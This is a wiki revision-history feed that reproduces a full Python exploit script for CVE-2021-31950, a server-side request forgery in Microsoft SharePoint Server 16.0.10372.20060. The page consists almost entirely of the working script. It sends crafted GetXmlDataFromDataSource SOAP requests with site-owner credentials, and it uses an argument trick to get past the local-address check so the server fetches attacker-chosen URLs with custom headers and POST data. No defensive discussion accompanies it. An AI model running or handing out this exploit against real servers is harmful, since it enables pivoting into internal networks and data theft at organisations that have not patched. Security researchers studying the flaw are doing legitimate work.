https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-31950_Microsoft_SharePoint_Server_16.0.10372.20060_SSRF%E6%BC%8F%E6%B4%9E
CVE-2021-31950 Microsoft SharePoint Server 16.0.10372.20060 SSRF漏洞 - Revision history
2026-04-17T12:46:44Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2021-31950_Microsoft_SharePoint_Server_16.0.10372.20060_SSRF%E6%BC%8F%E6%B4%9E&diff=4755&oldid=prev
Pwnwiki: Created page with "==SSRF== <pre> # Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF) # Date: 09 Jun 2021 # Exploit Auth..."
2021-06-11T09:39:41Z
<p>Created page with "==SSRF== <pre> # Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF) # Date: 09 Jun 2021 # Exploit Auth..."</p>
<p><b>New page</b></p><div>==SSRF==<br />
<pre><br />
# Exploit Title: Microsoft SharePoint Server 16.0.10372.20060 - 'GetXmlDataFromDataSource' Server-Side Request Forgery (SSRF)<br />
# Date: 09 Jun 2021<br />
# Exploit Author: Alex Birnberg<br />
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=57462<br />
# Version: 16.0.10372.20060<br />
# Tested on: Windows Server 2019<br />
# CVE : CVE-2021-31950<br />
<br />
#!/usr/bin/env python3<br />
<br />
import html<br />
import random<br />
import string<br />
import xml.sax.saxutils<br />
import textwrap<br />
import requests<br />
import argparse<br />
import xml.etree.ElementTree as ET<br />
from requests_ntlm2 import HttpNtlmAuth<br />
from urllib.parse import urlencode, urlparse<br />
<br />
class Exploit:<br />
def __init__(self, args):<br />
o = urlparse(args.url)<br />
self.url = args.url<br />
self.service = o.path<br />
self.username = args.username<br />
self.password = args.password<br />
self.target = args.target<br />
self.headers = args.header <br />
self.method = args.request<br />
self.data = args.data<br />
self.content_type = args.content_type<br />
self.s = requests.Session()<br />
self.s.auth = HttpNtlmAuth(self.username, self.password)<br />
self.s.headers = {<br />
'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'<br />
}<br />
self.s.proxies = {<br />
'http': 'http://127.0.0.1:8080'<br />
}<br />
<br />
def trigger(self):<br />
headers = ''<br />
if self.headers:<br />
for header in self.headers:<br />
header = list(map(lambda x: x.strip(), header.split(':')))<br />
if len(header) != 2:<br />
continue<br />
headers += '<dataurl:Header name="{}">{}</dataurl:Header>'.format(header[0], header[1])<br />
method = ''<br />
bypass_local = ''<br />
if self.method and self.method.upper() == 'POST':<br />
method = 'HTTP Post'<br />
else:<br />
method = 'HTTP Get'<br />
bypass_local = '<dataurl:Arguments><dataurl:Argument Name="{0}">{0}</dataurl:Argument></dataurl:Arguments>'.format(''.join(random.choice(string.ascii_letters) for i in range(16)))<br />
content_type = ''<br />
if self.content_type and len(self.content_type):<br />
content_type = '<dataurl:ContentType>{}</dataurl:ContentType>'.format(self.content_type)<br />
data = ''<br />
if self.data and len(self.data):<br />
data = '<dataurl:PostData Encoding="Decode">{}</dataurl:PostData>'.format(html.escape(self.data).encode('ascii', 'xmlcharrefreplace').decode('utf-8'))<br />
query_xml = textwrap.dedent('''\<br />
<udc:DataSource xmlns:udc="http://schemas.microsoft.com/data/udc" xmlns:udcs="http://schemas.microsoft.com/data/udc/soap" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:dsp="http://schemas.microsoft.com/sharepoint/dsp" xmlns:dataurl="http://schemas.microsoft.com/sharepoint/dsp/xmlurl"><br />
<udc:ConnectionInfo><br />
<udcs:Location href="">XMLURLDataAdapter</udcs:Location><br />
<soap:Header><br />
<dsp:versions><br />
</dsp:versions><br />
<dsp:request method="query" /><br />
</soap:Header><br />
<soap:Body><br />
<dsp:queryRequest><br />
<dsp:ptQuery><br />
<dataurl:Headers><br />
<dataurl:Url href="{}" Method="{}"/><br />
{}<br />
{}<br />
{}<br />
{}<br />
</dataurl:Headers><br />
</dsp:ptQuery><br />
</dsp:queryRequest><br />
</soap:Body><br />
</udc:ConnectionInfo><br />
</udc:DataSource>'''.format(self.target, method, bypass_local, headers, data, content_type))<br />
query_xml = xml.sax.saxutils.escape(query_xml.replace('\r', '').replace('\n', '')) <br />
data = textwrap.dedent('''\<br />
<?xml version="1.0" encoding="utf-8"?><br />
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><br />
<soap:Body><br />
<GetXmlDataFromDataSource xmlns="http://microsoft.com/sharepoint/webpartpages"><br />
<queryXml>{}</queryXml><br />
</GetXmlDataFromDataSource><br />
</soap:Body><br />
</soap:Envelope>'''.format(query_xml))<br />
r = self.soap('webpartpages', 'http://microsoft.com/sharepoint/webpartpages/GetXmlDataFromDataSource', data)<br />
root = ET.fromstring(r.content)<br />
try:<br />
namespaces = {<br />
'soap': 'http://schemas.xmlsoap.org/soap/envelope/'<br />
}<br />
value = list(root.find('soap:Body', namespaces).iter())[2] <br />
if value.tag == 'faultcode':<br />
print('Error:', list(root.find('soap:Body', namespaces).iter())[3].text)<br />
else:<br />
print(value.text)<br />
except:<br />
print(r.content)<br />
pass<br />
<br />
def soap(self, service, action, data):<br />
headers = {<br />
'SOAPAction': '"{}"'.format(action),<br />
'Host': 'localhost',<br />
'Content-Type': 'text/xml; charset=utf-8',<br />
}<br />
return self.s.post('{}/_vti_bin/{}.asmx'.format(self.url, service), headers=headers, data=data)<br />
<br />
if __name__ == '__main__':<br />
parser = argparse.ArgumentParser()<br />
parser.add_argument('--url', help='Base URL', required=True, metavar='<url>')<br />
parser.add_argument('--username', help='Username of team site owner', required=True, metavar='<username>')<br />
parser.add_argument('--password', help='Password of team site owner', required=True, metavar='<password>')<br />
parser.add_argument('--target', help='Target URL to work with', required=True, metavar='<target>')<br />
parser.add_argument('-H', '--header', help='Pass custom header(s) to server', action='append', metavar='<header>')<br />
parser.add_argument('-X', '--request', help='Specify request command to use', metavar='<command>')<br />
parser.add_argument('-d', '--data', help='HTTP POST data', metavar='<data>') <br />
parser.add_argument('-c', '--content-type', help='Value for the "Content-Type" header', metavar='<type>')<br />
exploit = Exploit(parser.parse_args())<br />
exploit.trigger()<br />
</pre></div>
Pwnwiki